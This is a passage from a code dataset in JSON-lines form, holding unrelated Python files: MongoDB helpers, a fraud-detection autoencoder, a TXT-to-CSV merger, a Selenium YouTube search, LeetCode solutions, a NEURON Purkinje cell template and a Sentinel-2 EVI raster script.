pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def updateDictItems(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n try:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n except:\n raise\n else:\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n\nasync def deleteDictItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n result1 = await delete_one(dbName, collectionName, ele)\n if result1:\n pass\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def ItemExist(dbName, collectionName, filter={}):\n return await find_one(dbName, collectionName, filter)\n\n\nasync def check_if_collection_is_empty(dbName, collectionName):\n return await check_collection_count(dbName, collectionName)\n\n\"\"\"\n用户词相关\n\"\"\"\n\n\nasync def deleteUserDictItems(dbName, collectionName, targetCollection, currentpage, pagesize, sourceList=[], targetList=[]):\n if sourceList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for i in range(len(sourceList)):\n result = await insert_one(dbName, targetCollection, data=targetList[i])\n if result != 'project-unknownError':\n result1 = await delete_one(dbName, collectionName, sourceList[i])\n else:\n return ('error')\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def getFieldFromCollection(dbName, collectionName, field, filter={}):\n data = await find_one(dbName, collectionName, filter)\n return json.loads(data)[field] if data else ''\n\n\n# articles related\nasync def createArticleItems(dbName, collectionName, currentpage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def getArticles(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def getArticleBody(dbName, collectionName, xfilter={}, xshown={}, currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 Url表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def deleteArticleItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateArticleSplitWords(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print('++++++++++++++', dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n # print('result1',result1)\n if result1 == 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n else:\n return(result1)\n\n\"\"\"\n用户相关\n\"\"\"\n\n\nasync def fetchUsers(dbName, collectionName, showDict={},currentPage=1, pageSize=1000):\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown=showDict, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n\n\n\"\"\"\nbasicWords related\n\"\"\"\n\n\nasync def addBasicWords(dbName, collectionName, currentPage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n # if isinstance(result1, int):\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def fetchBasicWords(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 basicWords 表中符合条件的数据\n # print(dbName,collectionName,xfilter,xshown)\n result1 = await fetchTable(dbName, collectionName, xfilter=xfilter, xshown=xshown, xsort=xsort, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,'ccccccc')\n return result1\n\n\nasync def deleteBacisWordsItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateBasicWords(dbName, collectionName, queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print (dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n # print('result1',result1)\n if result1 == 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n else:\n return(result1)\n\n\"\"\"\nextendedWords related\n\"\"\"\n\n\nasync def addExtendedWords(dbName, collectionName, currentPage=1, pagesize=10, ItemInfos={}):\n # 直接使用 insert_many\n try:\n result1 = await insert_many(dbName, collectionName, data2insert=ItemInfos)\n except Exception as e:\n raise\n else:\n print('插入成功')\n # 获取所有数据(首页) 返回\n # result2 = await fetchAllProjects(currentpage=1, pagesize=10 ,returnTotalCount=True)\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pagesize, returnTotalCount=True)\n return (result2)\n\n\nasync def fetchExtendedWords(dbName, collectionName, idPrefix='',xfilter={}, xshown={}, xsort=[], currentpage=1, pagesize=10, returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的数据\n result1 = await fetchTable(dbName, collectionName, idPrefix= idPrefix,xfilter=xfilter, xshown=xshown, xsort=xsort, currentpage=currentpage, pagesize=pagesize, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\n\nasync def makeAggregations(dbName, collectionName, currentPage=1, pageSize = 10, xaggregate= [],types='topicWord',returnTotalCount=True):\n \"\"\"\n 获取 聚合数据 以及 符合条件的 数据总 数量,类似于 fetchTable\n \"\"\"\n\n # 构造 skip 和 limit\n skip = (currentPage - 1) * pageSize\n limit = pageSize\n\n if types == 'mword':\n # 只要 获取 到 mword,就行了,PVsum avg等职能通过 sub 相加,在前端\n print('xaggregate0000',xaggregate)\n #yxaggregate = []\n #yxaggregate.append({'$match': xaggregate[0]['$match']})\n #yxaggregate.append({'$group': {'_id':xaggregate[1]['$group']['_id']}})\n ## 在 yxaggregate ,中添加 '$count' 算子,\n #yxaggregate.append({'$count': 'totalCount'})\n result1 = list(await aggregate(dbName, collectionName, aggregation=xaggregate))\n\n # 添加 ID\n initID = 1\n for ele in result1:\n ele['word'] = ele.pop('_id')[types]\n ele['id'] = skip+ initID\n ele['_loading']= False\n ele['children'] = []\n initID += 1\n print('result1',result1)\n return {'count': len(result1),'content':result1}\n\n if returnTotalCount:\n # 1 读取所有项目数目,首先构建 ,只查询项目 数目的 查询表达式\n yxaggregate = []\n print('xaggregatemmm',xaggregate)\n if xaggregate[0]['$match']:\n yxaggregate.append({'$match': xaggregate[0]['$match']})\n if xaggregate[1].get('$group') and xaggregate[1].get('$group').get('_id'):\n yxaggregate.append({'$group': {'_id':xaggregate[1]['$group']['_id']}})\n\n # 在 yxaggregate ,中添加 '$count' 算子,\n yxaggregate.append({'$count': 'totalCount'})\n print('yxaggregate',yxaggregate)\n result1 = list(await aggregate(dbName, collectionName, aggregation=yxaggregate))\n \n if len(result1) == 0:\n #返回0, 并退出\n return ({'count': 0, 'content': []})\n else:\n result1 = result1[0]['totalCount']\n # 此处 result1 肯定是个数字, 0 或者 >0\n else:\n result1 = ''\n print('result1vvv',result1)\n # 2 读取所有的表信息\n result2 = []\n if (type(result1) == int and result1 > 0) or result1 == '':\n # 1-1: 存在数据,则继续下一步 1-2: 没有计算长度 ,也进入下一步。 否则,直接返回空\n\n # xaggregate.append({'$skip': skip}) # 获取全部数据,不需要分页\n # xaggregate.append({'$limit': limit})\n \n print('xaggregate',xaggregate)\n result2 = list(await aggregate(dbName, collectionName, aggregation=xaggregate))\n print('hello',result2) \n return (json.loads(json_util.dumps({'count': result1, 'content': result2})))\n\n\nasync def fetchExtendedWordsTopic(dbName, collectionName, currentPage=1, pageSize = 10,xaggregate =[],returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的 主题词 聚合 数据 \n result1 = await makeAggregations (dbName, collectionName, currentPage=currentPage, pageSize = pageSize, xaggregate=xaggregate, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\nasync def fetchExtendedWordsInherit(dbName, collectionName, currentPage=1,pageSize = 10, xaggregate =[],returnTotalCount=True):\n # 获取 特定项目 extendedWords 表中符合条件的 主题词 聚合 数据\n result1 = await makeAggregations (dbName, collectionName, currentPage=currentPage, types='mword',pageSize = pageSize, xaggregate=xaggregate, returnTotalCount=True)\n # print(result1,type(result1))\n return result1\n\nasync def deleteExtendedWordsItems(dbName, collectionName, deleteDictList=[]):\n if deleteDictList == []:\n # 什么也不删除\n return ('error')\n else:\n # 循环删除\n try:\n for ele in deleteDictList:\n # print(ele)\n result1 = await delete_one(dbName, collectionName, ele)\n # 成功,刷新列表\n result2 = await fetchTable(dbName, collectionName)\n return (result2)\n except:\n return ('error')\n\n\nasync def updateExtendedWords(dbName, collectionName, updateType='one',queryDict={}, setDict={}, pageSize=10, currentPage=1):\n # print('setDict',dbName,collectionName,setDict,queryDict,pageSize,currentPage)\n print('++++++++++++++', dbName, collectionName,\n setDict, queryDict, pageSize, currentPage)\n if updateType == 'many':\n result1 = await update_many(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n else:\n result1 = await update_one(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n #result1 = await update_many(dbName, collectionName, queryDict=queryDict, setDict=setDict)\n print('result1',result1)\n if result1 >= 1:\n print('插入成功')\n # 获取所有数据(首页) 返回\n result2 = await fetchTable(dbName, collectionName, xfilter={}, xshown={}, xsort=[], currentpage=currentPage, pagesize=pageSize, returnTotalCount=True)\n return (result2)\n else:\n return(result1)\n\n'''\n标签云相关\n'''\n\n\nasync def fetchUsageTags(dbName, collectionName):\n usageTags = await find(dbName, collectionName)\n return usageTags\n\n\nif __name__ == '__main__':\n update_one('KWM-5f5c4240e0c234a92a524a36', 'StopDict', {'_id': '5f5cdc64041c89a528d10776'}, {\n '$set': {'word': '测试qweqweqweqwe', 'modifiedTime': '2020-09-12 22:49:27'}})\n","sub_path":"kms-docker/kms-image/kms/database/db_advanced.py","file_name":"db_advanced.py","file_ext":"py","file_size_in_byte":28158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"545817816","text":"### Ref Materials\r\n## Data source : https://www.kaggle.com/mlg-ulb/creditcardfraud/data\r\n## This contain data set contain 492 frauds and 284,315 Normal transactions\r\n## Data highly imbalance due to that we are using Deep Autoencorder for creating model\r\n## Ref webpages & materials :\r\n## 1) https://shiring.github.io/machine_learning/2017/05/01/fraud\r\n## 2) https://blog.keras.io/building-autoencoders-in-keras.html\r\n## 3) https://towardsdatascience.com/applied-deep-learning-part-3-autoencoders-1c083af4d798\r\n## 4) https://medium.com/@curiousily/credit-card-fraud-detection-using-autoencoders-in-keras-tensorflow-for-hackers-part-vii-20e0c85301bd\r\n## 5) https://elitedatascience.com/keras-tutorial-deep-learning-in-python\r\n## 6) http://thesai.org/Downloads/Volume9No1/Paper_3-Credit_Card_Fraud_Detection_Using_Deep_Learning.pdf\r\n## 7) https://en.wikipedia.org/wiki/Autoencoder\r\n## 8) https://www.analyticsvidhya.com/blog/2016/01/12-pandas-techniques-python-data-manipulation/\r\n## 9) https://github.com/otenim/AnomalyDetectionUsingAutoencoder\r\n## 10) http://mail.tku.edu.tw/myday/teaching/1042/SCBDA/1042SCBDA09_Social_Computing_and_Big_Data_Analytics.pdf\r\n## 11) https://machinelearningmastery.com/binary-classification-tutorial-with-the-keras-deep-learning-library/\r\n## 12) https://machinelearningmastery.com/tutorial-first-neural-network-python-keras/\r\n\r\n\r\n## Importing libraries\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Dense\r\nfrom sklearn.preprocessing import MinMaxScaler\r\n\r\n#Importing csv file\r\ndf = pd.read_csv(\"./creditcard.csv\")\r\nprint('Null values :',df.isnull().values.any()) ## Checking whether data set contains any null values\r\nprint(df.describe()) ## Describe the data set\r\nprint('Import dataframe shape',df.shape) ## datframe size\r\nprint(df.head(2)) ##first 2 rows of the data frmae\r\nprint('***********************')\r\n\r\n# creating two days and tag them\r\ndf['day'] = np.where(df['Time']<86401, 'day1', 'day2')\r\ndf['Status'] = np.where(df['Class']==0, 'N', 'Y') # Adding new column and decode class\r\nprint('***********************')\r\nprint(df.head(2)) ##first 2 rows of the data frmae\r\n\r\n# Creting graphs to check fraud trnasactions & normal transactions\r\nplt.show(sns.lmplot(x='Time',y='Amount',data=df[df.day=='day1'],hue='Status')) # Day 1 Normal Vs Fraud transations\r\nplt.show(sns.lmplot(x='Time',y='Amount',data=df[df.day=='day2'],hue='Status')) # Day 2 Normal Vs Fraud transation\r\n#plt.show(sns.pairplot(df[df.day=='day1'], kind=\"scatter\",hue='Status'))\r\n#plt.show(sns.pairplot(df[df.day=='day2'], kind=\"scatter\",hue='Status'))\r\n\r\n## showing the anomoly\r\nplt.show(df.pivot_table(values=[\"Class\"],index=[\"Status\"],aggfunc='count').plot(kind='bar')) # Fraud Vs Normal\r\nplt.show(df.pivot_table(values=[\"Class\"],index=[\"day\",\"Status\"],aggfunc='count').plot(kind='bar')) # Fraud Vs Normal daily\r\n\r\nprint('***********************')\r\nprint(df.pivot_table(values=[\"Class\"],index=[\"Status\"],aggfunc='count')) # Fraud Vs Normal - pivot\r\nprint(df.pivot_table(values=[\"Class\"],index=[\"day\",\"Status\"],aggfunc='count')) # Fraud Vs Normal daily - pivot\r\n\r\n## Applying auto encorders\r\nprint('***********************')\r\ndata = df.drop(['Time','day','Status'], axis=1) # Removing unwanted columns\r\nprint(data.shape)\r\n\r\n## Scaling data\r\nprint('***********************')\r\nscaler = MinMaxScaler(feature_range=(0, 1))\r\ndata['Amount'] = scaler.fit_transform(data['Amount'].values.reshape(-1, 1))\r\nprint(data.Amount.describe())\r\nprint('*********************')\r\n\r\n# Data partition to test & train data set 70% totrain & 30% to test\r\nX_train, X_test = train_test_split(data, test_size=0.3, random_state=100)\r\nprint('x train',X_train.shape) ## train data set\r\nprint('x test',X_test.shape) ## test data set\r\n\r\nX_train = X_train[X_train.Class == 0] ## selecting only Normal transactions for inserting to autoencorder\r\nX_train = X_train.drop(['Class'], axis=1) ## removing class variable\r\ny_test = X_test['Class'] ## Test data\r\nX_test = X_test.drop(['Class'], axis=1) # Remove CLass variable to test the data\r\nX_train = X_train.values\r\nX_test = X_test.values\r\nprint('x train',X_train.shape)\r\nprint('x train',X_train.shape[1])\r\n\r\n## Deep Autoencorder\r\ninput_l=Input(shape=(29,))\r\n## Encode\r\nencoded=Dense(25,activation='relu')(input_l)\r\nencoded=Dense(20,activation='relu')(encoded)\r\nencoded=Dense(10,activation='relu')(encoded)\r\nencoded=Dense(5,activation='relu')(encoded)\r\n## Decode\r\ndecoded=Dense(10,activation='relu')(encoded)\r\ndecoded=Dense(20,activation='relu')(decoded)\r\ndecoded=Dense(25,activation='relu')(decoded)\r\ndecoded=Dense(29,activation='relu')(decoded)\r\n\r\nautoencorder=Model(inputs=input_l,outputs=decoded)\r\nautoencorder.compile(optimizer='adam', loss='binary_crossentropy')\r\n\r\nautoencorder.fit(X_train, X_train,\r\n epochs=200,\r\n batch_size=10000,\r\n shuffle=True,\r\n validation_data=(X_test, X_test))\r\n\r\n## Predict the result for test data set\r\npredictions=autoencorder.predict(X_test)\r\n\r\n## Error\r\nmse = np.mean(np.power(X_test - predictions, 2), axis=1)\r\nerror_df = pd.DataFrame({'reconstruction_error': mse,'true_class': y_test})\r\n\r\n## Confusion Matrix\r\n## get 2.6 as the thresor hold\r\nprint(error_df.head(2))\r\nprint('************************')\r\nerror_df['y_pred'] = np.where(error_df['reconstruction_error']>2.6, '1', '0')\r\nprint(pd.crosstab(error_df['true_class'], error_df['y_pred']))\r\n","sub_path":"CrCrdFraudGitHub.py","file_name":"CrCrdFraudGitHub.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"637515930","text":"'''\r\n到指定路徑old_Path下\r\n將資料夾內文字檔合併\r\n轉存到指定路徑\r\n'''\r\n#獲取目前時間\r\ndef get_Today():\r\n import time\r\n global today\r\n \r\n localtime = time.localtime()\r\n today = time.strftime(\"%Y-%m-%d\", localtime) \r\n return today\r\n\r\n#舊路徑上的所有TXT合併-->日期.txt\r\ndef merge_oldPath_txt():\r\n import os\r\n import os.path\r\n global txt_new_Path,new_Path #提供當天整合後的txt的路徑\r\n \r\n pwd = os.getcwd()#獲取目前路徑\r\n print(\"印出目前路徑-->\"+pwd)\r\n old_Path=pwd+\"\\\\old_Path\"#TXT合併前存放路徑\r\n new_Path=pwd+\"\\\\new_Path\"#TXT合併後存放路徑\r\n print(\"印出合併前存放 .txt的 file路徑-->\" + old_Path)\r\n print(\"印出合併後存放 .txt的 file路徑-->\" + new_Path)\r\n \r\n #重組目標路徑根據日期命名\r\n txt_new_Path = new_Path+'\\\\'+today+'.txt'\r\n print(\"合併後的檔名-->\"+txt_new_Path)\r\n\r\n # 獲取路徑內文件列表+印出\r\n filelist = os.listdir(old_Path)\r\n print(\"------------查看old_Path內的檔案清單------------\")\r\n print(filelist)\r\n\r\n # 合并文件,存在 mergeData.TXT 文件中\r\n print(\"------------合併TXT內容-->另存於新路徑------------\")\r\n with open(txt_new_Path, 'w', encoding='utf-8') as f:\r\n # 构建所有文件路路徑\r\n for filename in filelist:\r\n filepath = old_Path + '\\\\' + filename\r\n # 按行寫入\r\n for line in open(filepath):\r\n f.writelines(line)\r\n f.write('\\n')\r\n txt=\"完成合併-->\"+old_Path,\"已儲存於-->\"+txt_new_Path\r\n return txt\r\n\r\n#完成TXT轉換CSV\r\ndef mergeTXT_to_CSV():\r\n import numpy as np\r\n import pandas as pd\r\n \r\n #引用TXT的存放路徑\r\n txt = np.genfromtxt(txt_new_Path,dtype='str')\r\n print(txt)\r\n \r\n txtDF = pd.DataFrame(txt)\r\n #print(txtDF)\r\n #調整CSV的儲存路徑\r\n csv_new_Path = new_Path +'\\\\'+today+'.csv'\r\n txtDF.to_csv(csv_new_Path,index=False) \r\n txt=\"完成TXT轉換CSV存放於-->\" + csv_new_Path\r\n return txt\r\n\r\nget_Today()\r\nprint(merge_oldPath_txt())\r\nprint(mergeTXT_to_CSV())","sub_path":"mergeTXTtoCSV/mergeTXT_to_CSV.py","file_name":"mergeTXT_to_CSV.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221999873","text":"from typing import List\nfrom itertools import permutations\n\n\nclass Solution:\n def permutation(self, S: str) -> List[str]:\n\n # return list({\"\".join(cs) for cs in permutations(S, len(S))})\n\n ans = []\n S = sorted(S)\n\n def backtrack(r, s):\n if not len(s):\n ans.append(r)\n else:\n pre = ''\n for i in range(len(s)):\n if s[i] != pre:\n backtrack(r + s[i], s[:i] + s[i + 1:])\n pre = s[i]\n\n backtrack('', S)\n return ans\n","sub_path":"cxy/NO08.08/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"435908433","text":"from selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n\r\nclass OpenYoutube():\r\n def YoutubeTest(self):\r\n # chrome\r\n #chrome_path = \"C:\\\\Users\\\\soumya.patil\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python37-32\\\\Drivers\\\\chromedriver.exe\"\r\n #driver = webdriver.Chrome(chrome_path)\r\n \r\n # Firfox\r\n driver = webdriver.Firefox(executable_path=r'C:\\Users\\soumya.patil\\AppData\\Local\\Programs\\Python\\Python37-32\\Drivers\\geckodriver.exe')\r\n driver.maximize_window()\r\n driver.implicitly_wait(10)\r\n driver.get(\"https://www.youtube.com\")\r\n \r\n #click on search button\r\n searchTextBox = driver.find_element_by_name(\"search_query\")\r\n searchTextBox.click()\r\n \r\n searchTextBox1 = driver.find_element_by_name(\"search_query\")\r\n searchTextBox1.send_keys('Peppa pig')\r\n \r\n searchButton = driver.find_element_by_id(\"search-icon-legacy\")\r\n searchButton.click()\r\n \r\n time.sleep(3)\r\n youtubePlayer = driver.getElementById(\"movie_player\")\r\n youtubePlayer.getPlayerState()\r\n #SelectVideo = driver.find_element_by_id(\"video-title\")\r\n #SelectVideo.click()\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\nOY = OpenYoutube()\r\nOY.YoutubeTest() ","sub_path":"SeleniumTest/Youtube.py","file_name":"Youtube.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"321447508","text":"# Definition for a point.\n# class Point:\n# def __init__(self, a=0, b=0):\n# self.x = a\n# self.y = b\nclass UnionFind:\n def __init__(self, m, n):\n self.father = {}\n for i in range(n):\n for j in range(m):\n id = self.converttoId(i,j,m);\n self.father[id] = id \n\n def converttoId(self, x, y, m):\n return x*m + y\n \n def find(self, x):\n parent = self.father[x]\n while parent != self.father[parent]:\n parent = self.father[parent]\n return parent\n \n def compressed_find(self, x):\n parent = self.father[x]\n while parent != self.father[parent]:\n parent = self.father[parent]\n\n temp = -1;\n fa = self.father[x]\n while fa != self.father[fa]:\n temp = self.father[fa]\n self.father[fa] = parent\n fa = temp\n\n return parent\n\n \n def union(self, x, y):\n fa_x = self.find(x)\n fa_y = self.find(y)\n if fa_x != fa_y:\n self.father[fa_x] = fa_y\n \nclass Solution:\n # @param {int} n an integer\n # @param {int} m an integer\n # @param {Pint[]} operators an array of point\n # @return {int[]} an integer array\n def numIslands2(self, n, m, operators):\n dx = [0,-1, 0, 1]\n dy = [1, 0, -1, 0]\n island = [[0 for i in range(m)] for j in range(n)]\n ans = []\n uf = UnionFind(n, m)\n count = 0\n if operators != None:\n for i in range(len(operators)):\n count += 1\n x = operators[i].x\n y = operators[i].y\n if island[x][y] != 1:\n island[x][y] = 1\n id = uf.converttoId(x, y, m)\n # 计算上下左右四个点的位置\n for j in range(4):\n nx = x + dx[j]\n ny = y + dy[j]\n if 0 <= nx and nx < n and 0 <= ny and ny < m and island[nx][ny] == 1:\n nid = uf.converttoId(nx, ny, m)\n fa = uf.find(id)\n nfa = uf.find(nid)\n if fa != nfa:\n count -= 1\n uf.union(id, nid)\n\n ans.append(count)\n return ans","sub_path":"LeetCode/Number_of_Islands_II.py","file_name":"Number_of_Islands_II.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383807600","text":"\n\ndef get_keywords_by_label(connect):\n labels_keywords_map = {}\n cursor = connect.cursor()\n # 获取工作分类\n cursor.execute(\"SELECT ID FROM LABELS\")\n label_ids = cursor.fetchall()\n\n for label_id in label_ids:\n cursor.execute(\"SELECT KEYWORD FROM KEYWORDS WHERE LABEL_ID = %s\", label_id[0])\n keywords = cursor.fetchall()\n keyword_map = {label_id: keywords}\n labels_keywords_map.update(keyword_map)\n\n connect.commit()\n return labels_keywords_map\n","sub_path":"Category.py","file_name":"Category.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129251957","text":"#AutomationDebug.py\n#Example of Year 2019: Subsets 2, 3, 4\n#Applied to csv files with dtypes as objects and \n#further used by converting the required to floats and performing operations\n\nimport pandas as pd\n\nmy_df = pd.read_csv(\"Main_9.12.03.b_subset_4.csv\", encoding = \"latin-1\")\n\nmy_df['POSITIVE'] = pd.to_numeric(my_df['POSITIVE'] , errors = 'coerce')\nmy_df['NEGATIVE'] = pd.to_numeric(my_df['NEGATIVE'] , errors = 'coerce')\n\nmy_df = my_df.loc[my_df['QUESTION'] == 'Q44']\nmy_df = my_df.loc[my_df['SURVEYR'] == 2019]\nmy_df = my_df.iloc[0:,[20, 22]]\n\nprint (my_df)\n\ncount = my_df['POSITIVE'].count()\nprint ('Count: ' + str(count))\ncount = count.astype('float')\n\nmy_df.sum()[\"POSITIVE\"]\nmy_df.sum()[\"NEGATIVE\"]\n\naverage_mpln = my_df.sum()[\"POSITIVE\"] / count\naverage_mnlp = my_df.sum()[\"NEGATIVE\"] / count\n\nprint ('Average for POSITIVE: ' + str(average_mpln))\nprint ('Average for NEGATIVE: ' + str(average_mnlp))\n","sub_path":"python files/.ipynb_checkpoints/AutomationDebug-checkpoint.py","file_name":"AutomationDebug-checkpoint.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"165358790","text":"#Template of the Purkinje cell model, Mike Hausser (version 3, 20.2.97)\n#Templating by Lungsi 2019 based on ~/PC1997bHausser/P19.hoc\n#This template was sourced from Vetter et al. 2001 Dendritica ModelDB\nfrom neuron import h\n#from pdb import set_trace as breakpoint\n\nclass Purkinje(object):\n \"\"\"Multi-compartment cell\n \"\"\"\n def __init__(self):\n h.xopen(\"P20.hoc\")\n\n # The following are chosen as attributes for potential recording\n self.soma = h.soma\n self.dend_root = h.dendA1_0 # see Fig.2A Zang et al. 2018 10.1016/j.celrep.2018.07.011\n # Zang et al. 2018 used a modified version of this.\n # This model has smooth and spiny dendrites such that the\n # sparsely spiny dendrite sections are assumed to be likely innervated\n # by the climbing fibre.\n # However, since the cell is the main region of interest\n # PC1997aHausser is in ~/models/cells/ NOT in ~/models/synapses\n\n # no explicit dt is known to be given so use the default = 0.025\n","sub_path":"models/cells/PC1997bHausser/Purkinje.py","file_name":"Purkinje.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468908368","text":"import rasterio as rt\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom rasterio.plot import show\nfrom rasterio.plot import show\nfrom rasterio.mask import mask\nfrom fiona.crs import from_epsg\nimport pycrs\n\n# Index coefficients\nL = 1 \nC1 = 6\nC2 = 7.5\nG = 2.5\n#datasets names\ndatasets = ('20191207','20191217','20200425','20200106') \namount = len(datasets)\ndef read():\n\tglobal b,r,n,meta, size\n\tblue = rt.open('S_'+datasets[dataset]+'_B02.tif')\n\tred = rt.open('S_'+datasets[dataset]+'_B04.tif')\n\tnir = rt.open('S_'+\tdatasets[dataset]+'_B08.tif')\n\tmeta = blue.meta.copy()\n\tmeta.update(dtype=rt.float32,count=1,compress='lzw')\n\n\tb = blue.read(1)\n\tb = b/10000\n\t#g = image.read(2)\n\tr = red.read(1)\n\tr = r/10000\n\tn = nir.read(1)\n\tn = n/10000\n\tsize = b.shape\n\n\ndef index():\n\tglobal evi, evi_f\n\tevi = np.true_divide(n-r,L+n+(C1*r)-(C2*b))\n\tevi = evi*G\n\tevi_f = np.zeros(size)\n\tfor i in range(size[0]-1):\n\t\tfor j in range(size[1]-1):\n\t\t\tif evi[i,j] >= 0 and evi[i,j] <= 1:\n\t\t\t\tevi_f[i,j] = evi[i,j]\n\t\t\telse:pass\n\n\twith rt.open('S_'+datasets[dataset]+'_EVI.tif', 'w', **meta) as create:\n\t create.write(evi_f.astype(rt.float32),1)\n\tplt.imshow(evi)\n\tplt.colorbar()\n\tplt.show()\n\ndataset = 0\nwhile dataset != amount:\n\tread()\n\tindex()\n\tdataset = dataset + 1\n\n","sub_path":"RemoteSensing/Processing(Python)/SMainScriptV0.py","file_name":"SMainScriptV0.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152551336","text":"from bs4 import BeautifulSoup\r\nimport json\r\nimport requests\r\nimport 